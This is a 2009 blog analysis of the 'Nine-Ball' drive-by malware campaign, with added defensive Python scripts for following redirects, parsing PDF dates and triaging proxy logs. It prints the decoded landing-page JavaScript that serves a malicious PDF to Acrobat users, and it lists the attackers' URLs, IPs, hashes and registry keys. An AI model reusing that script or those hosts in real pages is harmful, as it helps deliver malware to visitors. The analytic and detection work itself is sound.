Friday, June 19, 2009

Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:

rnw.kz > bro.tw > rmi.tw > ninetoraq.in

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.

The following is a sample redirect/exploit path followed from the base redirect rnw.kz/index.php.

Exploit Analysis


http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php

All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)

The sites bro.tw and rmi.tw appear to use cookies to track visitor requests. Repeat requests from the same visitor are redirected to the benign site http://ask.com instead of the exploit landing page.
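Walking a chain like this by hand is tedious, so here is an added Python example (not code from the original post) that follows HTTP 302 and meta-refresh redirects, keeps a per-host cookie jar, and stops after a fixed hop count. Because it runs offline, the responses come from a constructed in-memory table that mimics the hops above, including the ask.com bail-out on a repeat visit; the cookie name `visited` and the exact Set-Cookie behaviour are assumptions, since the post does not show the real cookies.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed stand-in for the live hops described above; not captured traffic.
# url -> (status, headers, body)
FAKE_SITE = {
    "http://rnw.kz/index.php": (302, {"Location": "http://bro.tw/in.cgi?3"}, ""),
    "http://bro.tw/in.cgi?3": (
        200,
        {"Set-Cookie": "visited=1; path=/"},   # assumed cookie name
        '<html><head><META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://rmi.tw/in.cgi?6"></head></html>',
    ),
    "http://rmi.tw/in.cgi?6": (
        302,
        {"Location": "http://mias.tw/1/index.php", "Set-Cookie": "visited=1; path=/"},
        '<meta http-equiv="refresh" content="0;url=http://mias.tw/1/index.php">',
    ),
    "http://mias.tw/1/index.php": (200, {}, "<script>/* obfuscated landing page */</script>"),
}
TRACKING_HOSTS = {"bro.tw", "rmi.tw"}   # hosts the post says track repeat visitors
BAILOUT = "http://ask.com"

META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']*)["\']',
    re.IGNORECASE,
)

def fake_fetch(url, cookie_jar):
    """Offline stand-in for an HTTP client. Returns (status, headers, body).
    A tracking host that already set a cookie for us sends us to the bail-out site."""
    host = urlsplit(url).hostname
    if host in TRACKING_HOSTS and cookie_jar.get(host):
        return 302, {"Location": BAILOUT}, ""
    return FAKE_SITE.get(url, (200, {}, ""))

def store_cookies(url, headers, cookie_jar):
    """Remember the first name=value pair of a Set-Cookie header, keyed by host."""
    host = urlsplit(url).hostname
    raw = headers.get("Set-Cookie")
    if raw:
        name, _, value = raw.split(";", 1)[0].partition("=")
        cookie_jar.setdefault(host, {})[name.strip()] = value.strip()

def next_hop(url, status, headers, body):
    """Where does this response send the browser? Location header first, then meta refresh."""
    if status in (301, 302, 303, 307) and headers.get("Location"):
        return urljoin(url, headers["Location"]), "http-%d" % status
    m = META_REFRESH.search(body)
    if m:
        # content looks like "0; URL=http://..." or "0;url=..."
        _, _, target = m.group(1).partition("=")
        if target.strip():
            return urljoin(url, target.strip()), "meta-refresh"
    return None, None

def follow_chain(start, fetch, cookie_jar, max_hops=10):
    """Follow redirects from `start`; returns [(url, how_we_got_here), ...]."""
    chain = [(start, "start")]
    url = start
    for _ in range(max_hops):   # hop cap so a looping redirector cannot hang us
        status, headers, body = fetch(url, cookie_jar)
        store_cookies(url, headers, cookie_jar)
        nxt, how = next_hop(url, status, headers, body)
        if nxt is None:
            break
        chain.append((nxt, how))
        url = nxt
    return chain

if __name__ == "__main__":
    jar = {}
    for visit in (1, 2):
        print("visit %d:" % visit)
        for url, how in follow_chain("http://rnw.kz/index.php", fake_fetch, jar):
            print("  %-13s %s" % (how, url))
```

Replace fake_fetch with a real client that returns status, headers and body to run this against live hosts, and keep the hop cap low. The second visit in the demo shows why a fresh cookie jar (or a fresh egress IP) is needed for every pull of the chain: once bro.tw has seen you, you only ever get ask.com.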

The site http://mias.tw/1/index.php returns obfuscated JavaScript that, once decoded, checks for an Adobe Acrobat browser plugin and only then writes an EMBED tag referencing pdf.php.

// Decoded script from mias.tw/1/index.php: probes navigator.plugins for an
// Adobe Acrobat plugin and only then writes the EMBED that fetches pdf.php.
function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;   // set to true once an Acrobat plugin is found
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
}
}
}
}
catch (e){   // any error is swallowed so the probe fails silently
}
if (Qqz8W8MiQQlAc){
// only Acrobat-equipped visitors are served the malicious PDF
document.write(
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
}
else return false;
}
setTimeout("FVEopW91F0QKb();", 500);   // run 500 ms after the script executes


The request for pdf.php returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the Unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF metadata indicates it was created on June 6, 2009 with Nitro PDF Professional 6.0 and the BCL easyPDF 6.00.20 print driver. Note that the creation and modification stamps carry different UTC offsets (+03'00' and +02'00'), so the two-and-a-half-minute gap as written becomes just over an hour once both are normalised to UTC.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')
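The two timestamps above carry different UTC offsets, which is easy to miss when reading them by eye. The added Python example below (not code from the original post) parses the PDF date format D:YYYYMMDDHHmmSSOHH'mm' into timezone-aware datetimes and compares the stamps both as written and after normalising to UTC; the info-dictionary text is the page's own, reproduced as the sample input.

```python
import re
from datetime import datetime, timedelta, timezone

# The info-dictionary entries quoted above, reproduced as the sample input.
INFO_DICT = """\
/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')
"""

# PDF date string: D:YYYYMMDDHHmmSSOHH'mm'  (everything after the year is optional)
PDF_DATE = re.compile(
    r"^D:(?P<Y>\d{4})(?P<M>\d{2})?(?P<D>\d{2})?(?P<h>\d{2})?(?P<m>\d{2})?(?P<s>\d{2})?"
    r"(?:(?P<sign>[Zz+-])(?P<oh>\d{2})?'?(?P<om>\d{2})?'?)?$"
)

def parse_pdf_date(text):
    """Parse a PDF date string into a datetime (timezone-aware when an offset is present)."""
    m = PDF_DATE.match(text.strip())
    if not m:
        raise ValueError("not a PDF date: %r" % text)
    g = m.groupdict()
    # Omitted fields default as the PDF spec says: month and day to 1, time fields to 0.
    when = datetime(int(g["Y"]), int(g["M"] or 1), int(g["D"] or 1),
                    int(g["h"] or 0), int(g["m"] or 0), int(g["s"] or 0))
    sign = g["sign"]
    if sign is None:
        return when                       # no zone information at all
    if sign in ("Z", "z"):
        return when.replace(tzinfo=timezone.utc)
    offset = timedelta(hours=int(g["oh"] or 0), minutes=int(g["om"] or 0))
    return when.replace(tzinfo=timezone(offset if sign == "+" else -offset))

def info_dates(info_text):
    """Pull CreationDate and ModDate out of a textual info dictionary."""
    return {key: parse_pdf_date(raw)
            for key, raw in re.findall(r"/(CreationDate|ModDate)\s*\((D:[^)]*)\)", info_text)}

def compare_timestamps(dates):
    """Compare the two stamps as written (wall clock) and after zone normalisation."""
    c, m = dates["CreationDate"], dates["ModDate"]
    # Treat a missing zone as UTC so the subtraction never mixes naive and aware values.
    c_aware = c if c.tzinfo else c.replace(tzinfo=timezone.utc)
    m_aware = m if m.tzinfo else m.replace(tzinfo=timezone.utc)
    return {
        "offsets_differ": c_aware.utcoffset() != m_aware.utcoffset(),
        "wallclock_gap_seconds": int((m.replace(tzinfo=None) - c.replace(tzinfo=None)).total_seconds()),
        "utc_gap_seconds": int((m_aware - c_aware).total_seconds()),
        "mod_before_creation": m_aware < c_aware,
    }

if __name__ == "__main__":
    d = info_dates(INFO_DICT)
    for k, v in sorted(d.items()):
        print(k, v.isoformat())
    print(compare_timestamps(d))
```

For this file the stamps are 150 seconds apart as written but 3750 seconds apart in UTC. A zone change between creation and modification is worth recording in a timeline: it can mean two machines, a clock adjustment, or a tool that stamps in a different zone than the print driver.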

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All three exploits, if successful, issue a GET request for http://mias.tw/1/getexe.php, and the response is saved as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2 of 41 antivirus engines detect the malware.

Sandbox and scan reports: ThreatExpert, VirusTotal

File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.

c:\WINDOWS\system32\mscorewr.dll

File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:

Domain/IP Analysis

The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains currently resolve to 91.212.65.133:

bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw

The below table lists domain registration data for the domains hosted at 91.212.65.133:

Domain    Registration Provider   Registration Date   Registrant Country
mias.tw   WebCC Ltd.              2009-06-15          RU
bmt.tw    WebCC Ltd.              2009-05-17          RU
bro.tw    WebCC Ltd.              2009-06-03          RU
molo.tw   WebCC Ltd.              2009-06-09          RU
orep.tw   WebCC Ltd.              2009-06-15          RU
rmi.tw    WebCC Ltd.              2009-06-12          RU
sovi.tw   WebCC Ltd.              2009-06-12          RU
rnw.kz    SKILLTEX                2009-05-18          RU

Repeated redirect testing showed that the exploit landing site rotates among several hosts. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)
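The hosts, IPs and URL paths above are the indicators a defender would take from this analysis. The added Python example below (not code from the original post) turns them into a triage pass over web proxy logs: each client's hits are grouped in time order, the path is used to tag which stage of the chain was reached, and clients that fetched getexe.php are reported as likely infected. The log lines and their "<epoch> <client> <method> <url> <status>" layout are constructed for the example; ask.com is deliberately left out of the indicator set because it is the bail-out for repeat visitors, not part of the attack.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Indicators taken from the analysis above: hosts that served or fed the chain.
IOC_HOSTS = {
    "rnw.kz", "bro.tw", "rmi.tw", "mias.tw", "orep.tw", "bmt.tw", "molo.tw", "sovi.tw",
    "my-bilderrahmen.cn", "adultfex.com", "www.1w90.co.cc", "pendu1um.cn", "stopssse.info",
}
IOC_IPS = {"91.212.65.133", "85.17.200.207", "209.160.72.174",
           "213.182.197.251", "61.235.117.85", "66.199.237.127"}
# ask.com is the bail-out for repeat visitors and is deliberately NOT an indicator.

# Path fragments that mark a stage of the chain; only consulted once the host matched.
STAGE_BY_PATH = [
    ("/in.cgi", "redirector"),
    ("/getexe.php", "payload-fetch"),
    ("/pdf.php", "exploit-pdf"),
]

# Constructed proxy log lines, not real traffic: "<epoch> <client> <method> <url> <status>"
SAMPLE_LOG = """\
1245400000.123 10.0.0.5 GET http://www.example.com/ 200
1245400001.002 10.0.0.5 GET http://rnw.kz/index.php 302
1245400001.210 10.0.0.5 GET http://bro.tw/in.cgi?3 200
1245400001.540 10.0.0.5 GET http://rmi.tw/in.cgi?6 302
1245400001.800 10.0.0.5 GET http://mias.tw/1/index.php 200
1245400002.300 10.0.0.5 GET http://mias.tw/1/pdf.php 200
1245400004.900 10.0.0.5 GET http://mias.tw/1/getexe.php 200
1245400010.000 10.0.0.9 GET http://ask.com/ 200
1245400011.000 10.0.0.9 GET http://91.212.65.133/x/ 200
1245400012.000 10.0.0.7 GET http://adultfex.com/lb/index.php 200
"""

LINE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?)\s+(?P<client>\S+)\s+(?P<method>\S+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$")

def classify(url):
    """Return (reason, stage) if the URL touches an indicator, else None."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if host in IOC_HOSTS:
        reason = "host:" + host
    elif host in IOC_IPS:
        reason = "ip:" + host
    else:
        return None
    stage = "landing"
    for frag, name in STAGE_BY_PATH:
        if parts.path.endswith(frag):
            stage = name
            break
    return reason, stage

def triage(log_text):
    """Group indicator hits per client in time order: {client: [(ts, url, reason, stage), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue   # skip malformed lines rather than abort the whole pass
        found = classify(m.group("url"))
        if found:
            reason, stage = found
            hits[m.group("client")].append((float(m.group("ts")), m.group("url"), reason, stage))
    for client in hits:
        hits[client].sort()
    return dict(hits)

def likely_infected(hits):
    """Clients that reached the payload download, i.e. one of the exploits probably succeeded."""
    return sorted(c for c, rows in hits.items() if any(r[3] == "payload-fetch" for r in rows))

if __name__ == "__main__":
    result = triage(SAMPLE_LOG)
    for client, rows in sorted(result.items()):
        print(client, [(url, stage) for _, url, _, stage in rows])
    print("likely infected:", likely_infected(result))
```

A client that only touched a redirector or landing page may have been saved by a missing Acrobat plugin or a patched Reader; a client that reached getexe.php should be pulled for host triage (look for mscorewr.dll and the BHO CLSID listed above). Because the landing hosts rotate, the host set will need refreshing far more often than the stage tags.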

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the fireworks begin...
